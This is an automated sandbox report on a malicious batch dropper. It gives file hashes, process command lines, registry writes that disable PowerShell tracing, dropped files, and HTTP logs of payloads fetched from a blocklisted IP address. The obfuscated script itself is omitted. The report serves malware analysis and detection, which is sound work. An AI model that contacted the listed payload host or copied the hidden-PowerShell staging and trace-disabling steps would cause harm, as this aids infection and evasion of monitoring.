File name: 69acba5561c375a92d1b6354e63334cbb2184d6ae64583a189202d892248cd8b.bat

Full analysis: https://app.any.run/tasks/a88b847a-3fa5-46b1-8fa9-5528ca6528ea
Verdict: Malicious activity
Analysis date: June 13, 2024, 17:19:57
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (6325), with no line terminators
MD5: 20CA84F6106491B75D423A306281655A
SHA1: 886821F1A66E3AA2949E8ACF803704046567310C
SHA256: 69ACBA5561C375A92D1B6354E63334CBB2184D6AE64583A189202D892248CD8B
SSDEEP: 192:p6424zg7rOrRUVuVlfa7/jy66dIks0Onf:IGCNuVlfa7v6dIksL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3824)
  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 4140)
      • powershell.exe (PID: 3824)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)
    • Suspicious use of asymmetric encryption in PowerShell

      • cmd.exe (PID: 4140)
      • powershell.exe (PID: 3824)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4140)
      • powershell.exe (PID: 3824)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4548)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 5600)
    • Executes application which crashes

      • wab.exe (PID: 5600)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 3824)
    • Checks proxy server information

      • powershell.exe (PID: 3824)
      • wab.exe (PID: 5600)
      • WerFault.exe (PID: 2600)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 4548)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4548)
    • Reads the computer name

      • wab.exe (PID: 5600)
    • Checks supported languages

      • wab.exe (PID: 5600)
    • Manual execution by a user

      • clip.exe (PID: 2280)
    • Reads the software policy settings

      • WerFault.exe (PID: 2600)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 2600)
No Malware configuration.
Total processes: 136
Monitored processes: 11
Malicious processes: 4
Suspicious processes: 1

Behavior graph

Processes in the graph, in the order shown: cmd.exe, conhost.exe, powershell.exe, conhost.exe, cmd.exe, powershell.exe, cmd.exe, wab.exe, wab.exe, werfault.exe, clip.exe

Process information

Columns: PID | CMD | Path | Parent process
PID 1188 | CMD: "C:\Program Files (x86)\windows mail\wab.exe" | Path: C:\Program Files (x86)\Windows Mail\wab.exe | Parent: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID 1676 | CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Exogenously.Ebu && echo t" | Path: C:\Windows\System32\cmd.exe | Parent: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID 2280 | CMD: "C:\Windows\SysWOW64\clip.exe" | Path: C:\Windows\SysWOW64\clip.exe | Parent: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Clip - copies the data into clipboard
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID 2600 | CMD: C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5600 -s 260 | Path: C:\Windows\SysWOW64\WerFault.exe | Parent: wab.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID 3824 | CMD: powershell.exe -windowstyle hidden "<obfuscated PowerShell script body removed>" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 4124 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 4140 | CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\69acba5561c375a92d1b6354e63334cbb2184d6ae64583a189202d892248cd8b.bat" " | Path: C:\Windows\System32\cmd.exe | Parent: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID 4548 | CMD: "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script body removed; same script as in PID 3824>" | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Parent: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID 4916 | CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Exogenously.Ebu && echo t" | Path: C:\Windows\SysWOW64\cmd.exe | Parent: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID 5032 | CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | Path: C:\Windows\System32\conhost.exe | Parent: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 18 003
Read events: 17 981
Write events: 22
Delete events: 0

Modification events

All entries below are registry writes by PID 3824 (powershell.exe).

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
  • EnableFileTracing = 0
  • EnableAutoFileTracing = 0
  • EnableConsoleTracing = 0
  • FileTracingMask = (no value shown)
  • ConsoleTracingMask = (no value shown)
  • MaxFileSize = 1048576
  • FileDirectory = %windir%\tracing

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
  • EnableFileTracing = 0
  • EnableAutoFileTracing = 0
  • EnableConsoleTracing = 0
Executable files: 0
Suspicious files: 9
Text files: 7
Unknown types: 0

Dropped files

Columns: PID | Process | Filename | Type

PID 2600 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_wab.exe_b5636695c6edba5de66b3d65ae913293799b8f1_9c01b28c_8882dfbc-1877-43a4-956b-c84db230c4cd\Report.wer | Type: (not given)
MD5:
SHA256:
PID 3824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7HLTUCXZLC4CQZA8NLV3.temp | Type: binary
MD5:6033E1A17B8A1FC76EDC6D8B1C2A1868
SHA256:97D25BEC5E5BE152C9BA1BE278A58A35BCBAD351F4B449FF4B3F8E64DBF7ACA3
PID 3824 | powershell.exe | C:\Users\admin\AppData\Roaming\Exogenously.Ebu | Type: text
MD5:5EF2D5CA0645D6740CAA8788B7D3C661
SHA256:DFF4864E43686358CD3575F98A1684BA073105778C4FF8315512AC68D0B33514
PID 3824 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF114311.TMP | Type: binary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
PID 4548 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ixzzl4ce.5mw.ps1 | Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 4548 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k2k01hvj.jj1.psm1 | Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 2600 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERB05D.tmp.WERInternalMetadata.xml | Type: xml
MD5:8488D715A8C239DE507D4162FB5BE570
SHA256:10A6EE6B034A2BE2C35686EFFE3BCA051BFD09DDC5F213DCC36B4C1E0A7F22DB
PID 2600 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF14.tmp.dmp | Type: dmp
MD5:556E4E66F9C68C03E27A952998327AF4
SHA256:F7D111D1444D17A5717A3CD1371C49F1E5C959FB90FD012CFED2D3BE4680A276
PID 2600 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0AD.tmp.xml | Type: xml
MD5:719001509D8348E29A78F87A179DE09A
SHA256:1E8781F7405240B0CA15F3180F7D9F924AFAC06162F432BBC03BDE59F131C4CF
PID 3824 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | Type: binary
MD5:453F98E33EDC34049842DD955610E482
SHA256:B65BF10BE92326F6D1C5DAB4BBEBA901BFDF3280B8D9B0FBA8A86BB04F884106
HTTP(S) requests: 9
TCP/UDP connections: 59
DNS requests: 22
Threats: 2

HTTP requests

Columns: PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation (cells that were empty in the exported rows are omitted)

3824 | powershell.exe | GET | 200 | 194.59.31.187:80 | http://194.59.31.187/Craft67.csv | unknown | unknown
5504 | svchost.exe | GET | 200 | 72.247.176.73:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | unknown
5504 | svchost.exe | GET | 200 | 23.200.189.225:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | unknown
6036 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | unknown
624 | SIHClient.exe | GET | 200 | 23.200.189.225:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | unknown
624 | SIHClient.exe | GET | 200 | 23.200.189.225:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | unknown
5600 | wab.exe | GET | 200 | 194.59.31.187:80 | http://194.59.31.187/ertuB58.bin | unknown | unknown
2600 | WerFault.exe | GET | 200 | 72.247.176.73:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | unknown
2600 | WerFault.exe | GET | 200 | 23.200.189.225:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | unknown

Connections

Columns: PID | Process | IP | Domain | ASN | CN | Reputation (cells that were empty in the exported rows are omitted)

239.255.255.250:1900 | unknown
5504 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
5520 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
5140 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
5504 | svchost.exe | 72.247.176.73:80 | crl.microsoft.com | Akamai International B.V. | GB | unknown
3824 | powershell.exe | 194.59.31.187:80 | COGENT-174 | BG | unknown
5504 | svchost.exe | 23.200.189.225:80 | www.microsoft.com | Moratelindo Internet Exchange Point | ID | unknown
4 | System | 192.168.100.255:138 | whitelisted
5140 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 72.247.176.73
  • 95.101.63.66
whitelisted
www.microsoft.com
  • 23.200.189.225
whitelisted
www.bing.com
  • 95.101.63.39
  • 2.17.113.82
  • 2.17.113.104
  • 2.17.113.88
  • 2.17.113.99
  • 2.17.113.96
  • 2.17.113.105
  • 95.101.63.31
  • 95.101.63.33
whitelisted
r.bing.com
  • 2.17.113.96
  • 2.17.113.82
  • 95.101.63.33
  • 95.101.63.39
  • 2.17.113.99
  • 95.101.63.31
  • 2.17.113.104
  • 2.17.113.105
  • 2.17.113.88
whitelisted
login.live.com
  • 20.190.160.14
  • 40.126.32.76
  • 40.126.32.74
  • 20.190.160.17
  • 20.190.160.20
  • 40.126.32.136
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.140
  • 40.126.32.133
whitelisted
go.microsoft.com
  • 23.200.185.159
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
slscr.update.microsoft.com
  • 52.165.165.26
whitelisted
nexusrules.officeapps.live.com
  • 52.111.243.31
whitelisted

Threats

Columns: PID | Process | Class | Message

3824 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 39
5600 | wab.exe | Potentially Bad Traffic | ET HUNTING Generic .bin download from Dotted Quad